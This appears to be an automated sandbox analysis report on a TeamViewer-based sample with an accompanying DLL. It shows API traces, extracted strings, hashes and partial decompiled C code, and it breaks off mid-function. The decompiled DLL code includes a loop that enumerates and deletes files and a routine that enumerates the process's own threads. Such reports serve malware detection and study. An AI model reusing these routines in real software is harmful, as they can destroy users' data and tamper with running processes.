                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Value$Close$CreateServicewsprintf$Openlstrlen$HandleManagerMemoryQueryZero$ChangeConfig2Statuslstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 567274075-0
                                                                                                        • Opcode ID: eae204f389c1f621b27dd36b691c05d19db3884430729bffb298f8ab71c2c421
                                                                                                        • Instruction ID: 985342fdb1045be8696040687b4ae8c1befa1ec2a1fbcde9d4923bfbe8915419
                                                                                                        • Opcode Fuzzy Hash: eae204f389c1f621b27dd36b691c05d19db3884430729bffb298f8ab71c2c421
                                                                                                        • Instruction Fuzzy Hash: 2CF13FB1754304BEE220DBA5CC4AF6F7BACEB84B45F104519B749AA2C0DBB4D9048F67
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004FB7F9, Relevance: 107.7, APIs: 35, Strings: 26, Instructions: 957networkfilesleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 004FB815
                                                                                                        • GetTickCount.KERNEL32 ref: 004FB833
                                                                                                        • GetTickCount.KERNEL32 ref: 004FB849
                                                                                                        • GetTickCount.KERNEL32 ref: 004FB86E
                                                                                                        • Sleep.KERNEL32(00000064), ref: 004FB87A
                                                                                                        • GetTickCount.KERNEL32 ref: 004FB898
                                                                                                        • GetTickCount.KERNEL32 ref: 004FB917
                                                                                                        • __itoa.LIBCMT ref: 004FB984
                                                                                                        • HttpOpenRequestA.WININET(?,?,?,00000000,00000000,?,84400000,00000000), ref: 004FBA69
                                                                                                        • GetLastError.KERNEL32(00000001,00000000,00000001,00000000), ref: 004FBAA1
                                                                                                        • HttpAddRequestHeadersA.WININET(?,Content-Type: application/octet-streamContent-Transfer-Encoding: binary,000000FF,A0000000), ref: 004FBC0C
                                                                                                        • GetTickCount.KERNEL32 ref: 004FBC2D
                                                                                                        • HttpSendRequestExA.WININET(?,00000028,00000000,00000000,00000000), ref: 004FBC46
                                                                                                        • GetLastError.KERNEL32 ref: 004FBC54
                                                                                                        • InternetWriteFile.WININET(?,?,?,?), ref: 004FBD84
                                                                                                        • GetLastError.KERNEL32 ref: 004FBD9F
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,004E3FC0,00000000,00000000,?,?,00000338,?,?,?,?,?,?,Default), ref: 004A18C0
                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                          • Part of subcall function 004BEF63: __EH_prolog3.LIBCMT ref: 004BEF6A
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        • HttpEndRequestA.WININET(?,00000000,00000000,00000000), ref: 004FBE9D
                                                                                                        • GetLastError.KERNEL32 ref: 004FBEA7
                                                                                                        • HttpQueryInfoA.WININET(?,00000013,00000000,?,?), ref: 004FBEFC
                                                                                                        • _memset.LIBCMT ref: 004FBF1E
                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,?), ref: 004FBF39
                                                                                                        • _strncmp.LIBCMT ref: 004FBF52
                                                                                                        • _strncmp.LIBCMT ref: 004FBF6D
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004FC00D
                                                                                                        • HttpQueryInfoA.WININET(?,00000005,00000000,?,?), ref: 004FC0A0
                                                                                                        • _memset.LIBCMT ref: 004FC0C2
                                                                                                        • HttpQueryInfoA.WININET(?,00000005,?,?,?), ref: 004FC0DD
                                                                                                        • _strncmp.LIBCMT ref: 004FC0F6
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004FC196
                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 004FC230
                                                                                                        • _memset.LIBCMT ref: 004FC24E
                                                                                                        • InternetReadFile.WININET(?,?,?,?), ref: 004FC266
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004FC2B0
                                                                                                        • GetTickCount.KERNEL32 ref: 004FC3F3
                                                                                                        • GetTickCount.KERNEL32 ref: 004FC5EC
                                                                                                        Strings
                                                                                                        • 200, xrefs: 004FBF4A
                                                                                                        • NC.WriteHttp: unable to retrieve HTTP response body, last error = , xrefs: 004FC2C7
                                                                                                        • NC.WriteHttp: HTTP response status code = , xrefs: 004FBF8D
                                                                                                        • NC.WriteHttp: HTTP response content length is , xrefs: 004FC116
                                                                                                        • writeDatahttp.OpenRequest, xrefs: 004FBAAB
                                                                                                        • NC.WriteHttp: Setting LimitForGetInsteadPost to 0, xrefs: 004FC354
                                                                                                        • NC.WriteHttp: unable to retrieve HTTP response status code, last error = , xrefs: 004FC024
                                                                                                        • 204, xrefs: 004FBF65
                                                                                                        • NC.WriteHttp.Failed2 EC=, xrefs: 004FBCCC
                                                                                                        • &p=, xrefs: 004FB98C
                                                                                                        • */*, xrefs: 004FB941
                                                                                                        • NC.WriteHttp.PostBlockTimeout, xrefs: 004FC389
                                                                                                        • NC.WriteHttp: unable to retrieve HTTP response content length, last error = , xrefs: 004FC1AD
                                                                                                        • NC.WriteHttp: Retry limit reached, xrefs: 004FC3CD, 004FC479
                                                                                                        • GET, xrefs: 004FBA0F
                                                                                                        • &client=DynGate, xrefs: 004FB9A5
                                                                                                        • &data=, xrefs: 004FB9F3
                                                                                                        • /dout.aspx?s=, xrefs: 004FB957
                                                                                                        • NC.WriteHttp.Failed1 EC=, xrefs: 004FBB19
                                                                                                        • NC.WriteHttp.Resend, xrefs: 004FC442
                                                                                                        • NC.WriteHttp.Failed3 EC=, xrefs: 004FBDA9
                                                                                                        • NC.WriteHttp.Timeout, xrefs: 004FB8AD
                                                                                                        • writeDataHttp.SendRequestEx., xrefs: 004FBC5E
                                                                                                        • Content-Type: application/octet-streamContent-Transfer-Encoding: binaryX-Connection: close, xrefs: 004FBBFF
                                                                                                        • Content-Type: application/octet-streamContent-Transfer-Encoding: binary, xrefs: 004FBC06
                                                                                                        • POST, xrefs: 004FBA30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CountHttpTick$ErrorLast$Query$H_prolog3InfoRequest$CriticalInternetSection_memset_strncmp$FileInitialize$AvailableDataDeleteH_prolog3_H_prolog3_catchHeadersOpenReadSendSleepWrite__itoa_swprintf
                                                                                                        • String ID: NC.WriteHttp.Failed1 EC=$ NC.WriteHttp.Failed2 EC=$ NC.WriteHttp.Failed3 EC=$ NC.WriteHttp.PostBlockTimeout$ NC.WriteHttp.Resend$ NC.WriteHttp.Timeout$ NC.WriteHttp: HTTP response content length is $ NC.WriteHttp: HTTP response status code = $ NC.WriteHttp: Retry limit reached$ NC.WriteHttp: Setting LimitForGetInsteadPost to 0$ NC.WriteHttp: unable to retrieve HTTP response body, last error = $ NC.WriteHttp: unable to retrieve HTTP response content length, last error = $ NC.WriteHttp: unable to retrieve HTTP response status code, last error = $&client=DynGate$&data=$&p=$*/*$/dout.aspx?s=$200$204$Content-Type: application/octet-streamContent-Transfer-Encoding: binary$Content-Type: application/octet-streamContent-Transfer-Encoding: binaryX-Connection: close$GET$POST$writeDataHttp.SendRequestEx.$writeDatahttp.OpenRequest
                                                                                                        • API String ID: 2873065635-871557215
                                                                                                        • Opcode ID: 68ed0f7d56173b63a6f23a04409cfdb10f0b575a455e2ab3ad33490434fa7cf2
                                                                                                        • Instruction ID: 27af62c4672615e0fc1e2df86297175aa6cb2596e6136e4c056b301bfd405319
                                                                                                        • Opcode Fuzzy Hash: 68ed0f7d56173b63a6f23a04409cfdb10f0b575a455e2ab3ad33490434fa7cf2
                                                                                                        • Instruction Fuzzy Hash: 1C82BE70C0428CEFEF21EBA4CD85AEEBBB8AF15304F14409EE54667291DB781E48DB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004DC9D6, Relevance: 53.9, APIs: 15, Strings: 15, Instructions: 1354sleepwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004DC9F8
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                          • Part of subcall function 004CD12C: __EH_prolog3.LIBCMT ref: 004CD133
                                                                                                          • Part of subcall function 004CD12C: GetTickCount.KERNEL32 ref: 004CD14A
                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                          • Part of subcall function 004EA0E3: __EH_prolog3.LIBCMT ref: 004EA0EA
                                                                                                          • Part of subcall function 004EA0E3: GetCurrentThread.KERNEL32 ref: 004EA12F
                                                                                                          • Part of subcall function 004EA0E3: SetThreadPriority.KERNEL32(00000000), ref: 004EA136
                                                                                                          • Part of subcall function 004E9D17: __EH_prolog3.LIBCMT ref: 004E9D1E
                                                                                                          • Part of subcall function 004B982C: __EH_prolog3.LIBCMT ref: 004B9833
                                                                                                          • Part of subcall function 004B5743: __EH_prolog3.LIBCMT ref: 004B574A
                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(10000000,?,00000000,00000100), ref: 004B5794
                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(?,?,00000000,00000100), ref: 004B57CB
                                                                                                          • Part of subcall function 004BEE12: __EH_prolog3.LIBCMT ref: 004BEE19
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                        • GetTickCount.KERNEL32 ref: 004DD2FD
                                                                                                        • Sleep.KERNEL32(00000064), ref: 004DD31E
                                                                                                          • Part of subcall function 004C0863: __EH_prolog3.LIBCMT ref: 004C086A
                                                                                                          • Part of subcall function 004C8458: __EH_prolog3.LIBCMT ref: 004C845F
                                                                                                          • Part of subcall function 004B7793: __EH_prolog3_catch.LIBCMT ref: 004B779D
                                                                                                        • GetTickCount.KERNEL32 ref: 004DD324
                                                                                                        • PostMessageW.USER32(00000407,00000001,00000001,0085300C), ref: 004DD798
                                                                                                        • Sleep.KERNEL32(000000C8), ref: 004DDA99
                                                                                                        • __time32.LIBCMT ref: 004DDAD4
                                                                                                        • _rand.LIBCMT ref: 004DDAFF
                                                                                                        • _rand.LIBCMT ref: 004DDB2B
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,0085300C,0077C1F8), ref: 004DDB70
                                                                                                        • PostMessageW.USER32(00000407,00000001,00000002), ref: 004DDB9D
                                                                                                        • PostMessageW.USER32(00000407,00000001,00000003), ref: 004DDBD5
                                                                                                          • Part of subcall function 004DC716: __EH_prolog3.LIBCMT ref: 004DC71D
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,0085300C,0077C1F8), ref: 004DDC53
                                                                                                        Strings
                                                                                                        • BROWSER, xrefs: 004DCB58
                                                                                                        • GWW.CustomRouterUnavailable, xrefs: 004DD3D5
                                                                                                        • WaitAtGateway::Run(): Could not connect to Master-Server MasterIp=, xrefs: 004DD913
                                                                                                        • GWW.KeepAliveLost, xrefs: 004DD500
                                                                                                        • MANUAL, xrefs: 004DCB98
                                                                                                        • ProxySearch: Trying to connect with found setting: , xrefs: 004DCDFD
                                                                                                        • , Proxy-IP=, xrefs: 004DCC4B
                                                                                                        • WaitAtGateway::Run() Connect to Master successful, xrefs: 004DD8EC
                                                                                                        • ProxySearch: Failed. No working setting found., xrefs: 004DCF43
                                                                                                        • ProxySearch: Trying to connect with found setting: IE, xrefs: 004DCDD9
                                                                                                        • Proxy: Trying to connect. Mode=, xrefs: 004DCC60
                                                                                                        • WaitAtGateway, xrefs: 004DCA06, 004DD053, 004DD87A
                                                                                                        • TeamViewer, xrefs: 004DD396
                                                                                                        • ProxySearch: Trying to connect with found setting: DIRECT (NONE), xrefs: 004DCE60
                                                                                                        • DIRECT (NONE), xrefs: 004DCB18
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$Sleep$CountMessagePostTick$InitializeLoadStringThread_rand$CurrentDeleteEnterH_prolog3_catchLeavePriority__time32
                                                                                                        • String ID: , Proxy-IP=$BROWSER$DIRECT (NONE)$GWW.CustomRouterUnavailable$GWW.KeepAliveLost$MANUAL$Proxy: Trying to connect. Mode=$ProxySearch: Failed. No working setting found.$ProxySearch: Trying to connect with found setting: $ProxySearch: Trying to connect with found setting: DIRECT (NONE)$ProxySearch: Trying to connect with found setting: IE$TeamViewer$WaitAtGateway$WaitAtGateway::Run() Connect to Master successful$WaitAtGateway::Run(): Could not connect to Master-Server MasterIp=
                                                                                                        • API String ID: 1809673057-3897402427
                                                                                                        • Opcode ID: 82ce981411d909151036682d3c9c0a85cd5ec3ac912e571d59255b1457e1a05d
                                                                                                        • Instruction ID: d9812ff84bd4b09a939aa376837265a540f3df5c3d9b162d162bc6b2bbe51010
                                                                                                        • Opcode Fuzzy Hash: 82ce981411d909151036682d3c9c0a85cd5ec3ac912e571d59255b1457e1a05d
                                                                                                        • Instruction Fuzzy Hash: 5AC21770D05288AADF11EBA4C965BEEBBB5AF51304F14409FE04167392DB7C1F48C76A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982960, Relevance: 22.6, APIs: 15, Instructions: 107filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E70982960() {
				intOrPtr _v8;
				short _v1048;
				short _v1056;
				short _v1060;
				struct _WIN32_FIND_DATAW _v1644;
				signed char _v1648;
				signed int _t24;
				void* _t28;
				void* _t42;
				intOrPtr _t49;
				WCHAR* _t58;
				void* _t60;
				void* _t61;

				_push(0x250);
				_push( &(_v1644.ftLastAccessTime));
				L7098BF02();
				_push(0x410);
				_push( &_v1048);
				L7098BF02();
				_t49 =  *0x7098f5cc; // 0xa4b6c8
				_push(_t49);
				_t24 = wsprintfW( &_v1060, StrChrW(0x7098c564, 0x25));
				_t60 =  &(_v1644.ftLastAccessTime) + 0xc;
				_push(_v8);
				_push(0x2a);
				_push(0x7098c560);
				_t58 = _t60 + 0x274 + _t24 * 2;
				wsprintfW(_t58, StrChrW(0x7098c550, 0x25));
				_t61 = _t60 + 0x14;
				_t28 = FindFirstFileW( &_v1048,  &(_v1644.ftCreationTime)); // executed
				_t42 = _t28;
				 *_t58 = 0;
				if(_t42 == 0xffffffff) {
					return _t28;
				} else {
					do {
						if(lstrcmpW( &(_v1644.cFileName), StrChrW(0x7098c548, 0x2e)) == 0 || lstrcmpW( &(_v1644.dwReserved1), StrChrW(0x7098c540, 0x2e)) == 0) {
							 *_t58 = 0;
						} else {
							lstrcatW( &_v1056,  &(_v1644.dwReserved1));
							if((_v1648 & 0x00000010) == 0) {
								if(_v8 == 0) {
									E709827F0( &_v1056);
									_t61 = _t61 + 4;
									 *_t58 = 0;
								} else {
									DeleteFileW( &_v1056);
									 *_t58 = 0;
								}
							} else {
								 *_t58 = 0;
							}
						}
					} while (FindNextFileW(_t42,  &_v1644) != 0);
					return FindClose(_t42);
				}
			}
















                                                                                                        0x7098296a
                                                                                                        0x70982973
                                                                                                        0x70982974
                                                                                                        0x70982979
                                                                                                        0x70982985
                                                                                                        0x70982986
                                                                                                        0x7098298b
                                                                                                        0x70982997
                                                                                                        0x709829b0
                                                                                                        0x709829b9
                                                                                                        0x709829bc
                                                                                                        0x709829bd
                                                                                                        0x709829bf
                                                                                                        0x709829cb
                                                                                                        0x709829d6
                                                                                                        0x709829d8
                                                                                                        0x709829e8
                                                                                                        0x709829ee
                                                                                                        0x709829f2
                                                                                                        0x709829f9
                                                                                                        0x70982ab4
                                                                                                        0x709829ff
                                                                                                        0x70982a05
                                                                                                        0x70982a18
                                                                                                        0x70982a8b
                                                                                                        0x70982a2f
                                                                                                        0x70982a3c
                                                                                                        0x70982a47
                                                                                                        0x70982a59
                                                                                                        0x70982a79
                                                                                                        0x70982a7e
                                                                                                        0x70982a83
                                                                                                        0x70982a5b
                                                                                                        0x70982a63
                                                                                                        0x70982a6b
                                                                                                        0x70982a6b
                                                                                                        0x70982a49
                                                                                                        0x70982a4b
                                                                                                        0x70982a4b
                                                                                                        0x70982a47
                                                                                                        0x70982a9b
                                                                                                        0x00000000
                                                                                                        0x70982aa4

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(00000250,00000250), ref: 70982974
                                                                                                        • RtlZeroMemory.NTDLL(?,00000410), ref: 70982986
                                                                                                        • StrChrW.SHLWAPI(7098C564,00000025,00A4B6C8,?,00000410,00000250,00000250,00000000,00000000,00000000,?), ref: 7098299F
                                                                                                        • wsprintfW.USER32 ref: 709829B0
                                                                                                        • StrChrW.SHLWAPI(7098C550,00000025,7098C560,0000002A,?), ref: 709829D2
                                                                                                        • wsprintfW.USER32 ref: 709829D6
                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 709829E8
                                                                                                        • StrChrW.SHLWAPI(7098C548,0000002E), ref: 70982A0C
                                                                                                        • lstrcmpW.KERNEL32(?,00000000), ref: 70982A14
                                                                                                        • StrChrW.SHLWAPI(7098C540,0000002E), ref: 70982A21
                                                                                                        • lstrcmpW.KERNEL32(?,00000000), ref: 70982A29
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 70982A3C
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 70982A63
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 70982A95
                                                                                                        • FindClose.KERNEL32(00000000), ref: 70982AA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$MemoryZerolstrcmpwsprintf$CloseDeleteFirstNextlstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 1322953341-0
                                                                                                        • Opcode ID: 35e1821fd6751958e7247f467f03da7f2582c42585f87d4f8adc663b96e42245
                                                                                                        • Instruction ID: 05c437833e3bc916f4adfb2bf67bebfa7c369eaa215db4db621023534ee72d8f
                                                                                                        • Opcode Fuzzy Hash: 35e1821fd6751958e7247f467f03da7f2582c42585f87d4f8adc663b96e42245
                                                                                                        • Instruction Fuzzy Hash: 0C318DB221C345AAD724EB64CC49FEF77ACAFC4700F404A2DB546962D0E775A5049B63
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E177C, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 115COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004E179B
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0000000C), ref: 004E17CE
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 004E17DB
                                                                                                        • _wcscat_s.LIBCMT ref: 004E17FA
                                                                                                        • _memset.LIBCMT ref: 004E1818
                                                                                                        • GetPrivateProfileStringW.KERNEL32(Installation,INSTEXE,0077C1F8,?,00000100,?), ref: 004E183F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$H_prolog3ModuleNamePathPrivateProfileRemoveSpecString_memset_wcscat_s
                                                                                                        • String ID: INSTEXE$Installation$\tvinfo.ini
                                                                                                        • API String ID: 3006198713-428253807
                                                                                                        • Opcode ID: 4dfca4606730a594190ca88299eede0f2a57f66a9d3f03c291560af50b21233c
                                                                                                        • Instruction ID: 509cd7efbefe80bf997b95202da801206c46533324e6e5bee6f0a68a4001ef9e
                                                                                                        • Opcode Fuzzy Hash: 4dfca4606730a594190ca88299eede0f2a57f66a9d3f03c291560af50b21233c
                                                                                                        • Instruction Fuzzy Hash: 1841B4B1A80249ABDB20EF65DC81AEE77A8FF45304F50402AFD05E7291DB789E09CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B420, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106memorynativethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B420(long* __esi) {
				long _t27;
				int _t28;
				long _t29;
				void _t31;
				long _t34;
				void* _t36;
				void* _t37;
				void* _t40;
				long _t44;
				void* _t52;
				void* _t53;
				void* _t55;
				intOrPtr _t57;
				long* _t58;
				void* _t60;
				long* _t62;

				_t58 = __esi;
				_t62[4] = 0;
				_t27 = NtQuerySystemInformation(5, 0, 0, _t62); // executed
				if(_t27 == 0xc0000004) {
					_t27 =  *_t62;
					if(_t27 != 0) {
						_t28 = VirtualAlloc(0, _t27, 0x1000, 4); // executed
						_t55 = _t28;
						_t62[3] = _t55;
						if(_t55 == 0) {
							L23:
							return _t28;
						}
						_t29 = NtQuerySystemInformation(5, _t55, _t62[1],  &(_t62[1])); // executed
						if(_t29 < 0 || _t62[1] <= 0) {
							L22:
							_t28 = VirtualFree(_t55, _t62[1], 0x8000);
							goto L23;
						} else {
							_t60 = _t55;
							do {
								if( *((intOrPtr*)(_t60 + 0x44)) != GetCurrentProcessId()) {
									L19:
									_t31 =  *_t60;
									if(_t31 == 0) {
										break;
									}
									goto L20;
								}
								_t40 = 0;
								if( *((intOrPtr*)(_t60 + 4)) <= 0) {
									goto L19;
								}
								_t8 = _t60 + 0xdc; // 0xdc
								_t62[4] = _t8;
								do {
									_t57 =  *(_t62[4]);
									if(_t57 == GetCurrentThreadId()) {
										goto L17;
									}
									_t34 =  *_t58;
									if(_t34 != 0) {
										_t44 = _t58[1];
										if(_t58[2] < _t44) {
											L16:
											 *((intOrPtr*)( *_t58 + _t58[2] * 4)) = _t57;
											_t58[2] = _t58[2] + 1;
											goto L17;
										}
										_t52 =  *0x7098f6d4; // 0x2e70000
										_t36 = HeapReAlloc(_t52, 0, _t34, _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44);
										if(_t36 == 0) {
											break;
										}
										_t58[1] = _t58[1] + _t58[1];
										 *_t58 = _t36;
										goto L16;
									}
									_t58[1] = 0x80;
									_t53 =  *0x7098f6d4; // 0x2e70000
									_t37 = HeapAlloc(_t53, _t34, 0x200);
									 *_t58 = _t37;
									if(_t37 == 0) {
										break;
									}
									goto L16;
									L17:
									_t62[4] = _t62[4] + 0x40;
									_t40 = _t40 + 1;
								} while (_t40 <  *((intOrPtr*)(_t60 + 4)));
								_t55 = _t62[5];
								goto L19;
								L20:
								_t60 = _t60 + _t31;
